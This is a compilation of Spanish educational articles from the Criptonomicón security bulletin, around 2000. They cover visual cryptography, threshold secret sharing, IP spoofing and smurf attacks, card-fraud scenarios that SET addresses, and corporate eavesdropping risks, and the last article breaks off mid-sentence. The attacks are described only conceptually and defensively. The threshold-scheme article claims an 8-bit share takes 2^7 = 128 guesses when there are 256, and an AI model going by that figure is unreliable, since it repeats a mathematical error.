file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos27.html (2 of 9) [25/10/2000 02:30:56 p.m.]

Criptografa visual

Figura 2. Enmascaramiento de un pixel original en un esquema 2 de 2.


Si el pixel original es blanco, el director lanza una moneda al aire, de modo
que si el resultado es cara, elige como pixeles para cada una de las sombras
los dos pixeles de la primera lnea de la figura 2.a; si el resultado es cruz
elige como pixeles para cada sombra los dos pixeles de la segunda lnea. De
forma anloga se procede para enmascarar un pixel negro, utilizando la
figura 2.b. El algoritmo que se acaba de describir se ejecuta con cada uno de
los pixeles de la imagen secreta.
Las caractersticas del algoritmo anterior son las siguientes: (i) la obtencin

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos27.html (3 of 9) [25/10/2000 02:30:56 p.m.]

Criptografa visual

de un semipixel blanco-negro o negro-blanco tiene la misma probabilidad (p


= 0'5), y no depende del color del pixel original (por tanto, los pixeles de las
sombras no proporcionan ninguna informacin a los participantes, sobre el
color del pixel original), (ii) el proceso de enmascaramiento de los pixeles es
aleatorio (lanzar una moneda), y los resultados obtenidos en cada prueba
son independientes (por tanto, no se obtiene informacin adicional si se
observa un grupo de pixeles en cualquiera de las sombras).
Cuando se superponen las dos sombras (ver las columnas s1+s2 de las
figuras 2.a y 2.b) se obtiene, si el pixel original era blanco, un pixel
negro-blanco o blanco-negro, y un pixel negro si el pixel original era negro.
Por tanto, cuando se superponen los pixeles de las sombras de un pixel
original negro, se obtiene un pixel negro en la imagen que se recupera.
Mientras que los pixeles blancos pierden contraste por el hecho de que el
pixel que se obtiene al superponer las sombras es negro-blanco o
blanco-negro y no completamente blanco (esta prdida de contraste
recomienda utilizar imgenes claramente definidas).
Si la sucesin de caras (c) y cruces (x) obtenida por el observador para
enmascarar cada uno de los 64 pixeles fue: ccxxxcxc, xxccxxxx, ccxxccxc,
ccxcxccx, xxccxcxc, xxccxcxc, cxxcxxxc, cccxxccx, las sombras obtenidas se
muestran en las figuras 3 y 4:

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos27.html (4 of 9) [25/10/2000 02:30:56 p.m.]

Criptografa visual

Figura 3. Sombra obtenida para el primer participante.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos27.html (5 of 9) [25/10/2000 02:30:56 p.m.]

Criptografa visual

Figura 4. Sombra obtenida para el segundo participante.


Las dos sombras sern impresas o fotocopiadas por el director a dos
transparencias y entregadas de forma secreta a cada uno de los dos
participantes. Superponiendo las dos transparencias de las dos sombras
anteriores, la imagen original recuperada es la que se muestra en la figura 5
(la figura se presenta con dos tonos para que se aprecie la imagen original y
la prdida de contraste).

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos27.html (6 of 9) [25/10/2000 02:30:56 p.m.]

Criptografa visual

Figura 5. Imagen secreta recuperada.


El procedimiento anterior se puede extender a esquemas visuales ms
generales mediante algoritmos adecuados, que requieren el uso de matrices
y permutaciones.
A modo de ejemplo se presentan, en la figura 6, las sombras de otra imagen,
as como la imagen recuperada.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos27.html (7 of 9) [25/10/2000 02:30:56 p.m.]

Criptografa visual

Figura 6. Smbolo de victoria.


Publicado en el Boletn del Criptonomicn #27.
Luis Hernndez Encinas es Doctor en Ciencias Matemticas de la Universidad de
Salamanca y co-autor del libro Tcnicas Criptogrficas de proteccin de datos, de la
editorial Ra-Ma.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos27.html (8 of 9) [25/10/2000 02:30:56 p.m.]

Criptografa visual

Informacin adicional

Pgina personal de D. Stinson, en la Universidad de Waterloo, Canad

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos27.html (9 of 9) [25/10/2000 02:30:56 p.m.]

Esquemas umbrales

Comercio electrnico

Criptologa y seguridad

Esquemas umbrales

Cuestiones legales

Por Luis Hernndez Encinas

Intimidad y privacidad

En determinadas ocasiones una instancia superior o director no desea que

Virus

determinado secreto sea conocido en su integridad por una nica persona.


Entonces, el director divide el secreto en varias partes o sombras, de tal
forma que para recuperar el secreto en su totalidad sea necesario el
concurso de terminado nmero de partes, siendo imposible recuperarlo con
menos partes de las establecidas.
Una situacin en la que se puede presentar el problema anterior es la
siguiente: una sucursal bancaria tiene 3 empleados, pero ninguno de ellos
quiere tener toda la responsabilidad de conocer la combinacin de la caja
fuerte de la sucursal. El problema que se presenta es cmo lograr que cada
maana se abra la caja fuerte del banco para hacer los pagos necesarios,
sin que la responsabilidad recaiga en un nico empleado.
Una forma de solventar este problema, de modo que la caja fuerte pueda ser
abierta cada maana, consiste en dividir la combinacin de la caja en tres
partes, una para cada empleado, de modo que sta slo pueda ser abierta
cuando se unan las combinaciones parciales de, al menos, 2 de los
empleados.
Los problemas similares al planteado anteriormente se conocen como
esquemas umbrales m de n (el problema anterior del banco se conoce como
esquema umbral 2 de 3, dado que la combinacin de la caja se divide en 3
partes y es necesario reunir, al menos, 2 de ellas para poder abrirla). Los
esquemas umbrales tienen dos valores que los definen: el nmero de
personas necesarias para obtener el secreto (m) y el nmero de
participantes (n).
En general, un esquema umbral para dividir el secreto S, en m partes
(llamadas sombras) y en el que hay n participantes, debe cumplir las
siguientes condiciones:
1. Cada participante recibe de forma secreta una sombra de las n en que se

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos26.html (1 of 3) [25/10/2000 02:30:56 p.m.]

Esquemas umbrales

ha dividido el secreto.
2. Cualesquiera m participantes pueden determinar el valor del secreto sin
ms que compartir las sombras que cada uno de ellos posee.
3. Ningn grupo de m-1 participantes, o menos, puede conocer ninguna
informacin sobre el valor secreto.
En estos esquemas el director lleva a cabo el proceso de dividir el secreto en
las n sombras y entrega, secretamente, cada una de las sombras a cada uno
de los participantes.
Para conocer cmo trabajan los esquemas umbrales, vamos a presentar un
ejemplo de cmo construir un esquema umbral 2 de 2, donde el secreto es
una cadena de bits. En este caso, el secreto debe romperse en 2 sombras,
de modo que cada una de ellas estar formada por una coleccin de bits, y
ser necesaria la colaboracin de las dos partes para recuperar el secreto
original.
Supongamos que el secreto elegido por el Director es la siguiente cadena de
bits: S=(01001010). El director elabora la primera de las sombras de forma
aleatoria: s1=(11001101). Para construir la segunda sombra, el director
utiliza la siguiente tabla de sumar:
0 + 0 = 0, 0 + 1 = 1, 1 + 0 = 1 y 1 + 1 = 0 (la tabla de sumar mdulo 2).
Como se cumple que:
0 + 1 = 1, 1 + 1 = 0, 0 + 0 = 0, 0 + 0 = 0, 1 + 1 = 0, 0 + 1 = 1, 1 + 0 = 1 y 0 + 1
= 1,
la segunda sombra es: s2=(10000111).
Para recuperar el secreto, basta con que los dos participantes pongan en
comn sus dos sombras y las sumen, bit a bit:
1 + 1 = 0, 1 + 0 = 1, 0 + 0 = 0, 0 + 0 = 0, 1 + 0 = 1, 1 + 1 = 0, 0 + 1 = 1 y 1 + 1
= 0,
lo que proporciona el valor secreto original: S=(01001010).
Si uno de los participantes quisiera recuperar el secreto original utilizando
slo su sombra, debera suponer cul es la sombra del otro participante.
Para ello necesitara probar, en el ejemplo anterior, un total de 2^7 = 128
posibilidades (dos valores, 0 y 1, a colocar en 7 posiciones), lo cual debera
empujarle a desistir de tal intento.
El ejemplo del esquema umbral anterior puede extenderse a esquemas ms
generales, del tipo 2 de n y del tipo m de n, pero en este caso las bases
matemticas necesarias son un poco ms complejas y no sern comentadas
aqu.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos26.html (2 of 3) [25/10/2000 02:30:56 p.m.]

Esquemas umbrales

Publicado en el Boletn del Criptonomicn #26.


Luis Hernndez Encinas es Doctor en Ciencias Matemticas de la Universidad de
Salamanca y co-autor del libro Tcnicas Criptogrficas de proteccin de datos, de la
editorial Ra-Ma.

Informacin adicional

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos26.html (3 of 3) [25/10/2000 02:30:56 p.m.]

Mitos sobre ICMP

Comercio electrnico

Criptologa y seguridad

Mitos sobre ICMP

Cuestiones legales

Por Carlos Veira Lorenzo

Intimidad y privacidad

Introduccin

Virus

De forma ms o menos recurrente, aparecen mensajes por Internet que


hacen referencias un tanto alegres a temas como el spoofing o a ciertos
ataques sobre ICMP.
El carcter extremadamente tcnico de Internet favorece la creacin de
'mitos' entre el pblico menos cualificado. Resulta normal sentirse
apabullado por la avalancha de siglas y trminos extraos que se acaban
atribuyendo a la magia o al designio de algn oscuro gur localizado en un
piso franco de EE.UU.
El Spoofing
El IP Spoofing consiste en enviar un paquete IP con la direccin de origen
falseada, de forma que el destinatario crea que proviene de otra localizacin.
Esta tcnica puede emplearse para muchas cosas, entre otras para un
ataque DoS.
Sin embargo, el IP spoofing no es una tcnica cuyo xito dependa nica y
exclusivamente de quin emite el paquete. Es decir, nosotros podemos
mandar un paquete con una direccin de origen falseada, pero ese paquete
no llegar nunca a su destino.
En redes grandes (como Internet) existen muchos dispositivos de red que
pueden realizar filtrados al trfico que gestionan. Uno de esos filtros es
precisamente la comprobacin de la IP de origen. Los dispositivos a los que
me refiero son los de siempre:
cortafuegos
routers
conmutadores
Servidores de acceso
...

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos63.html (1 of 3) [25/10/2000 02:30:57 p.m.]

Mitos sobre ICMP

Evidentemente, el IP spoofing funciona en una LAN (sobre todo en las que


sean tipo bus pasivo). Sin embargo, en Internet no podemos suponer que, a
priori, el IP spoofing puede funcionar. Los ISP aplican (o deberan aplicar)
filtros en los servidores de acceso y en sus routers para 'paliar' este
problema. En el peor de los casos, si no lo hace el ISP, lo har el carrier, as
que estamos en una situacin parecida.
Veamos un ejemplo. Un Servidor de acceso puede incorporar un filtro que
garantice que los paquetes enviados tienen la IP de origen que asign el
RADIUS a cada uno de sus puertos. En el peor de los casos, el filtro puede
ser por pool de direcciones asignadas al servidor de acceso. En este caso,
verificara que la IP de origen estuviera dentro de los rangos asignados a la
tarjeta correspondiente (normalmente menos de una clase C).
Lo mismo puede hacerse en un router, pero con menos precisin. Un router
filtra necesariamente por grupos de direcciones. El administrador conoce
qu rangos direcciones de origen deberan llegar por cada una de las
interfaces del router, y debera aplicar los filtros correspondientes.
Por tanto, para que un ataque DoS + IP spoofing tenga xito desde una
enlace PPP dial-up convencional, tanto el carrier como el ISP tendran que
ser muy descuidados.
Si tenemos acceso interactivo a un host remoto (una shell Unix por ejemplo),
podramos hacer spoofing en su segmento de red y atacar los sistemas
situados en ese entorno, pero ese es un escenario distinto: las
comunicaciones no se inician desde nuestra conexin dial-up, sino en el host
remoto.
Eso significa que si alguien quiere nukear, normalmente tendr que hacerlo
'a cara descubierta' (con el riesgo de ser detectado) o a travs de una shell
Unix en cualquier punto de Internet. Tambin implica que el uso de ICMP
para forzar desconexiones normalmente slo es posible si podemos
situarnos en la misma LAN y *no* atravesando Internet.
En redes internas o cerradas, tal vez pudiera funcionar, si asumen un
modelo de confianza elevado. En cualquier caso, no podemos asumir, a
priori, que un ataque basado en IP Spoofing pueda tener xito desde
Internet: sera una cuestin de prueba-error. ;)
Smurf
El xito de un ataque tipo smurf se basa en dos principios que tienen que
darse *simultneamente*:
'IP Source address spoofing'
La transformacin de trfico broadcast nivel 3 en broadcast nivel 2. Es
decir que la multidifusin IP se transforme en multidifusin Ethernet
(por poner un ejemplo).

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos63.html (2 of 3) [25/10/2000 02:30:57 p.m.]

Mitos sobre ICMP

Sobre el primer punto ya hemos hablado en el primer punto. Sobre el


segundo, comentar que casi todos los routers (sobre todo los modernos)
vienen configurados con esta opcin deshabilitada por defecto.
En cualquier caso, puede, nuevamente, filtrarse en el router y evitar que
usen nuestra red como amplificador de trfico. De hecho, la mayora de las
redes tienen esta proteccin activada.
Es cierto que existen listas de redes grandes que continan mal
configuradas y que pueden usarse como amplificadores. Sin embargo, para
que smurf tenga xito, deben tenerse en cuanta las consideraciones de
sobre spoofing mencionadas anteriormente.
Publicado en el Boletn del Criptonomicn #63.
Carlos Veira Lorenzo es experto en redes del departamento de Internet de Airtel Mvil
S.A.

Informacin adicional

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos63.html (3 of 3) [25/10/2000 02:30:57 p.m.]

El lado oscuro de SET

Comercio electrnico

Criptologa y seguridad

El lado oscuro de SET

Cuestiones legales

Por Luis Lpez Fernandez

Intimidad y privacidad

SET (Secure Electronic Transaction) es un protocolo transaccional orientado

Virus

a las aplicaciones de comercio electrnico a travs de tarjetas de crdito. A


diferencia de otros protocolos seguros de carcter general como SSL
(Secure Sockets Layer), SET fue expresamente diseado para el comercio
electrnico y no sirve para ninguna otra cosa, por eso no supone ninguna
mejora en cuanto a la seguridad en la comunicacin propiamente dicha, pero
mejora las condiciones en las que el proceso de comercio electrnico tiene
lugar.
Una vez que cada participante ha obtenido un certificado, SET se rige por un
dilogo entre tres entidades:
El poseedor de la tarjeta de crdito o comprador.
El comerciante.
La pasarela de pago, que est controlada por un banco.
La seguridad del protocolo se basa fundamentalmente en un sistema estricto
de certificacin (norma X509) y en que cada uno de los agentes conoce
exclusivamente la informacin que le concierne y que le es estrictamente
necesaria para poder realizar la compra, la venta o la transaccin. As el
comerciante no llegar a saber cual es el nmero de tarjeta de crdito del
comprador, ni la pasarela de pago cuales son los productos comprados por
el consumidor. Quizs la manera ms grfica de comprender algunos de lo
mecanismos de SET es ver algunos ejemplos de mejoras respecto a los
modelos tradicionales.
Ejemplos de fraudes:
El comerciante "misssing in the wind": El tpico "hacker" de 18 aos
que se monta un servidor en Singapur o en algn otro paraso legal de
Internet vendiendo memorias, discos duros o lo que sea a mitad de
precio. Por supuesto que el servidor utiliza la ltima versin de SSL
con cifrado fuerte y todo lo dems. Como la comunicacin es segura el
comprador incauto adquiere varios cientos de unidades facilitando su

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos61.html (1 of 4) [25/10/2000 02:30:57 p.m.]

El lado oscuro de SET

nmero de tarjeta de crdito sin pedir ms referencias. A las dos


semanas el servidor desaparece de Internet y el comerciante del
mapa, por supuesto que de las memorias compradas no se vuelve a
or hablar, el hacker puede entonces utilizar toda la informacin que ha
adquirido sobre el comprador para hacer cientos de cosas perversas
de las que mejor no hablar. Nada de esto hubiese pasado si el
comprador hubiese exigido un certificado electrnico, expedido por una
autoridad de certificacin de confianza, que acreditase que ese
comerciante era quien deca ser y no un estafador de tres al cuarto. Es
cierto que SSL permite la utilizacin de certificados pero por desgracia
nadie los exige, ni los comerciantes ni los consumidores en la red.
SET, por construccin, obliga a que todos los agentes que intervienen
en el proceso de comercio electrnico estn debidamente certificados
por una autoridad de confianza.
El comprador fantasma: El comprador fantasma es una persona con
conocimientos de Internet y de como funciona la compra-venta con
tarjetas de crdito, un da hurgando el la basura de su vecino o
mirando en su buzn, encuentra una de sus facturas que contiene un
nmero de tarjeta de crdito (un ticket del restaurante o de la
gasolinera que normalmente todos tiramos a la papelera sin darle
mayor importancia tambin vale). Con ese nmero de tarjeta y dando
el nombre de su vecino el desalmado compra varias docenas de CD en
su tienda electrnica favorita y hace que se los enven a una direccin
en la que l sabe que no vive nadie en ese momento. Cuando el
cartero llega, como no hay nadie, se deja una nota en el buzn
indicando que se puede recoger el paquete en correos, ahora solo
queda hacerse pasar por el vecino para disfrutar de un montn de CD
que l ha pagado pero que nunca ver. Que el importe de los CD
termine pagndolos el vecino o la tienda que los vende por Internet es
algo que el banco resolver cuando se presenten la denuncia
correspondiente, lo que s es seguro es que los CD no los vuelve a ver
ninguno de los dos. Como en el caso anterior, esto no hubiese pasado
si el comerciante hubiese pedido un certificado electrnico al
comprador, adems de su nmero de tarjeta.
Daos colaterales: Este es un ejemplo interesante que demuestra que
aunque el comerciante y el comprador sean honrados y pongan toda
su buena voluntad tambin pueden suceder desastres. Imaginemos
esa tienda "on line" que tiene miles de compradores que confan en
ella. La tienda est basada en varios servidores seguros que utilizan
SSL. Los compradores habituales son introducidos en una base de
datos que contiene su nombre, direccin y su nmero de tarjeta de
crdito, as cada vez que uno de estos clientes quiere adquirir un
producto se le piden solamente las primeras cifras del nmero de
tarjeta para asegurarse de su identidad, evitando as que el nmero
deba ser transmitido de nuevo por la red. Desgraciadamente el
cortafuegos de la red corporativa del comerciante tiene un agujero de

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos61.html (2 of 4) [25/10/2000 02:30:57 p.m.]

El lado oscuro de SET

seguridad que permite a un cracker penetrar en su intranet y llegar a la


mquina que contiene la base de datos de los clientes, al da siguiente
circula por las news un fichero con miles de nmeros de tarjetas de
tarjetas de crdito de honrados compradores. En este caso el fallo
fundamental es que, dada la arquitectura de SSL, el comerciante debe
conocer el nmero de tarjeta de crdito del cliente para poder cobrar el
importe de la venta. SET evita este tipo de problemas haciendo que el
comprador cifre su nmero de tarjeta de crdito con la clave pblica de
la pasarela de pago. De este modo el comprador recibe un paquete
cifrado que es como un cheque, l no puede ver el nmero de tarjeta
de crdito pero puede guardarlo y envirselo al banco cuando crea
conveniente, el banco, cuando lo reciba su pasarela de pago, podr
descifrarlo y comprobar que el nmero de tarjeta facilitado corresponde
realmente con un nmero vlido. A continuacin la cantidad convenida
podr ser transferida a la cuenta del comerciante.
Como ya hemos visto SET supone un avance considerable en cuanto a la
seguridad de las transacciones monetarias por comercio electrnico en
Internet, no obstante no hay que creer que todo son ventajas:
El protocolo es robusto pero a costa de ser muy pesado y muy costoso
en ancho de banda requerido y en tiempo de cmputo criptogrfico. En
particular el sistema de certificacin jerrquico puede ser realmente
penoso. Esto hace que SET est muy bien adaptado para
transacciones de gran valor, pero muy mal adaptado para
transacciones de pequeas cantidades de dinero, en esta lnea se
estn desarrollando toda una familia de protocolos que se denominan
de "micropagos" que prometen ser de gran utilidad en el futuro.
El protocolo surge de un estndar propuesto por las empresas VISA y
MasterCard. Algunas otras grandes empresas como IBM, Microsoft,
Netscape, etc. se han ido adhiriendo, el resultado final el que SET es
controlado por un consorcio que impone sus propias normas, las que a
ellos les interesan, esto ha hecho que algunos comerciantes hayan
hecho saltar la voz de alarma por temor a que gran parte del negocio
se les escape en funcin de comisiones. As algunos empresarios
prefieren decidirse por soluciones propietariasque son capaces de
controlar mejor.
El hecho de que los certificados y las claves secretas deban estar
almacenados en el disco duro del ordenador de compradores y
comerciantes puede ser fuente de un gran nmero de problemas. En
este sentido la utilizacin de tarjetas inteligentes protegidas por
sistemas biomtricos supondra un gran avance, de hecho en Francia
se est desarrollando un nuevo estndar basado en SET que utiliza
tarjetas inteligentes como medio de almacenamiento de certificados y
claves secretas. Este nuevo estndar se denomina C-SET.
En definitiva, SET es un protocolo robusto y que ofrece un nivel de seguridad
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos61.html (3 of 4) [25/10/2000 02:30:57 p.m.]

El lado oscuro de SET

suficiente pero a costa de hacerlo muy pesado y complejo de utilizar. La


implantacin de SET est siendo bastante lenta, a da de hoy la mayora de
los comerciantes y bancos interesados en hacer negocio por la red optan por
soluciones basadas en SSL. Adems estn surgiendo constantemente
nuevos protocolos y sistemas de pago seguros que compiten seriamente con
SET. Todo esto hace pensar, que si bien el protocolo no est muerto, deber
mejorar si quiere imponerse como estndar de comercio electrnico en el
nuevo milenio.
Publicado en el Boletn del Criptonomicn #61.
Luis Lpez Fernandez es Ingeniero de Telecomunicaciones por el ENST Telecom-Paris.
Realiz una plataforma de demostracin del protocolo SET en Telecom-Paris bajo la
supervisin de Ahmed Serhrouchni y actualmente es ayudante en la Escuela Ciencias
Experimentales y Tecnologa de la Universidad Rey Juan Carlos.

Informacin adicional

Seguridad en el comercio electrnico: SSL o SET?

Seguridad en SSL, artculo publicado en iWorld.

SET a fondo, artculo publicado en iWorld.

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos61.html (4 of 4) [25/10/2000 02:30:57 p.m.]

Proteccin integral de la informacin de la empresa

Comercio electrnico

Criptologa y seguridad

Proteccin integral de la informacin de la empresa

Cuestiones legales

Por ngel Ripoll

Intimidad y privacidad

La proteccin de la informacin es, hoy, vital para la supervivencia de

Virus

cualquier organizacin. Esto no es un secreto. Sin embargo, descuidamos


esta faceta de nuestra seguridad, regalando oportunidades, a cualquiera que
quiera saber algo de nosotros. Estamos acostumbrados a tener alarmas,
cerraduras, etc. para proteger nuestros bienes, pero descuidamos
lamentablemente, la proteccin de algo intangible, pero mas importante,
nuestra intimidad. En estas breves hojas, lo nico que pretendo es alertarle
sobre algunos riesgos, y darle algunas soluciones sencillas. Le ruego que las
lea con detenimiento, y las aplique, ya que son de prctica general en
aquellas Organizaciones que estn concienciados sobre estos temas ( y que
suelen funcionar mejor que el resto)
Antes de empezar
No es mi intencin el darle una informacin suficiente para que usted pueda
transformarse en un tcnico, sino darle algunos conceptos, para lo que se
conoce como "Proteccin de la Informacin", que es algo mas amplio que la
deteccin de escuchas, sea algo ms que un nombre raro, y usted y su
Organizacin puedan vivir un poco mas seguros.
Lo que pretendo es dar la informacin imprescindible a cualquier
responsable de Proteccin, para que sepa lo que debe hacer, pueda leer
otros textos ampliatorios, y obtenga el mximo de los servicios que le puedo
prestar.
Lo que s es importante, es que todas aquellas medidas preventivas que se
relacionan, las conozca, y sea capaz de obligar a ponerlas en prctica a su
Organizacin, como manera ms sencilla y barata de evitar las escuchas. Y
evitar la "cara de tonto", que se le pone a la gente, cuando descubre que
hace meses que le estn escuchando sin darse cuenta.
Es importante destacar que de lo que se trata es de proteger un "intangible",
y normalmente ser lo ms valioso de una empresa, es decir, el

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (1 of 11) [25/10/2000 02:30:58 p.m.]

Proteccin integral de la informacin de la empresa

conocimiento, o como normalmente se conoce: la informacin.


Pas la poca en la que el principal papel de la Seguridad era la proteccin
de unas instalaciones, de unas materias primas o elaboradas, de unos
medios de produccin. Hoy, en plena economa de la "tercera ola", el
principal capital de una organizacin son las personas y sus conocimientos,
y los conocimientos de produccin, ventas, mercado, etc. que la Empresa
posee. Hoy es mucho ms ruinoso para una fbrica la prdida del "backup",
que la destruccin fsica de las instalaciones de produccin. Y eso que es
del sector secundario. En el terciario la prdida es absoluta. Hoy la nica
diferencia entre una empresa de xito y las dems, es que "saben" ms, y lo
aplican con mejores mtodos. Y como es lgico, las dems intentaran
saberlo, y por cualquier medio.
1- Importancia de la proteccin de la informacin
La relativa tranquilidad existente en Espaa en materia de espionaje
industrial y comercial lleva a que sistemticamente se diagnostique como
paranoico a todo aquel que manifieste una mnima preocupacin por la
seguridad en el tratamiento de la informacin.
No obstante, lo cierto es que en la empresa actual el valor ms importante
radica en la informacin. Han pasado ya los tiempos en que los elementos
productivos eran la base efectiva del negocio y hoy, ms importante que la
mquina es la informacin que permite saber qu, cmo y cundo hacer
algo. Sin consideracin a la bondad o maldad de dicha situacin, la sociedad
americana viene a ser el paradigma de la asignacin de recursos bajo
criterios de imprescindibilidad. Desde el momento en que la industria
americana destina importantes sumas de dinero a cuidar su seguridad,
resulta evidente que por algo lo har. Y ese algo es que muchas empresas
han sufrido el dao que causa una fuga incontrolada de informacin.
El principal problema que plantea esta cuestin es que todos estamos de
acuerdo en que la falta de control sobre la informacin es un riesgo latente,
pero muchos ven difcil la materializacin del mismo en un momento dado.
Que en un determinado momento no se den las circunstancias propicias
para temer un intento de acceso a nuestra informacin interna no significa
que ste no vaya a producirse, ello independientemente de que el nmero
de posibles amenazas es, generalmente, desconocido por nosotros mismos.
Es evidente que un competidor puede estar interesado en nuestros secretos.
Pero no es el nico que puede estarlo. Un trabajador resentido, un periodista
vido de escndalos, un grupo de investigacin estatal, un miembro de
nuestro propio equipo de trabajo, etc., pueden estar interesados en
determinada informacin, sea para fines lcitos o ilcitos. Podemos tener una
relativa tranquilidad de que nuestros competidores no iniciarn una guerra ni
utilizarn tcticas ilegales para apoderarse de nuestros secretos. Pero no
podemos presumir lo mismo de cuantas personas crean que podrn obtener

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (2 of 11) [25/10/2000 02:30:58 p.m.]

Proteccin integral de la informacin de la empresa

un beneficio por el conocimiento de nuestra informacin. Sencillamente


porque no podemos saber quin puede creer eso.
Incluso respecto de compaas competidoras en un mercado tranquilo tal
presuncin es temeraria y la historia reciente lo demuestra. El hecho de que
una persona no considere determinadas prcticas como propias del mercado
no significa que otra, carente de tales escrpulos, no las utilice, ahora o en el
futuro. Y nadie puede determinar la fecha, exacta o aproximada, de ese
futuro.
La moderna tecnologa permite llevar a cabo sistemas de espionaje con un
mbito extraordinario, de forma imperceptible y con total impunidad. Baste
como ejemplo sealar que, hoy en da, por menos de 15 millones de pesetas
se puede adquirir en el mercado un equipo capaz de monitorizar todas las
conversaciones mantenidas a travs de un telfono mvil GSM,
independientemente del lugar donde est su usuario. O un dispositivo para
intervenir telfonos (de la mejor tecnologa), no llega a las 100.000 Si
comparamos estas cifras con el presupuesto invertido por la modernas
compaas en estudios de mercado veremos lo irrisorio de su importe. De
verdad alguien est convencido de que nadie es capaz de invertir estas
cantidades para conocer nuestros secretos?
Pero, adems, el riesgo no est, ni exclusiva ni principalmente, en el acceso
de firmas competidoras a la informacin interna de una compaa. Incluso en
el seno de la propia empresa, un acceso incontrolado a la informacin es
fuente de conflictos imprevisibles y, en la mayora de los casos, de
sospechas mutuas que enturbian el clima de trabajo.
Nadie puede valorar el efecto que producir en un tercero una determinada
informacin. Por ello, toda la informacin debe ser objeto de proteccin
frente a fugas incontroladas. Incluso la intil.
Veamos, si no, un ejemplo real. Una compaa prev un estancamiento y
posterior recesin del mercado. El Director Financiero establece un plan de
austeridad de gastos, materializado en un presupuesto restrictivo. La
situacin no es agradable y, como entretenimiento, introduce en el mismo
programa de simulacin una fantasa: mercado en expansin y aumento de
ventas. Todos los directivos agradecen la distensin que supone romper la
decepcin que el verdadero informe ha supuesto. Finalizada la reunin, el
Director Financiero guarda bajo llave el informe real. Y deja sobre su mesa la
simulacin intil. Que problema hay, si es informacin falsa? El resultado
de todo ello es un pobre Director de Recursos Humanos casi desquiciado
tras una semana de negociacin de la renovacin del convenio laboral de la
empresa por la incomprensible necedad del Comit de Empresa, obstinado
en negar un hecho tan evidente como el estancamiento del mercado y la
prevista disminucin de las ventas. Una copia del informe falso haba llegado
a manos de los trabajadores.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (3 of 11) [25/10/2000 02:30:58 p.m.]

Proteccin integral de la informacin de la empresa

Otro ejemplo real. Un directivo nota repentinamente un cambio en la actitud


y disposicin al trabajo de uno de sus colaboradores directos. Sin una
explicacin deducible, baja su rendimiento, su carcter es pasivo y su trato
fro y distante. Lo que ocurri, y el directivo desconoca, es que dej en un
cajn de su mesa su propuesta de aumentos salariales para el personal del
departamento y tal trabajador pudo comparar su situacin con la de otros.
La informacin personal debe ser tambin objeto de especial proteccin y
reserva y ser facilitada slo respecto de datos imprescindibles y, al margen
de otros directivos, a un nico colaborador de especial confianza. Datos
como el domicilio y telfono particulares, segundas residencias, tenencia y
localizacin de bienes de recreo, etc., son datos intranscendentes en
situaciones de normalidad. No obstante, con ocasin de despidos
